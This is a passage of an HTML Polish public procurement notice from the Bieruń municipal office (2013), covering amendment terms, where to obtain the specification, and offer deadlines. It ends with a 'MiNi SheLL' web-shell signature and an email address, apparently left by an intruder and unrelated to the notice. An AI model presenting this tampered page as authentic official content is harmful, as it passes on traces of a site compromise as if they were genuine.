       c. mającym  wpływ  na  realizację  przedmiotu  umowy, w  przypadku  gdy  nastąpi zmiana powszechnie  
           obowiązujących przepisów prawa; 
       d. innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, a które nie wykraczają  
           poza zakres art. 140 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych, pokój nr 15, II piętro, segment A,
43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2013 godzina 10:00, miejsce: Urząd Miejski w Bieruniu - Sekretariat, pokój nr 9, I piętro, segment A,
43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com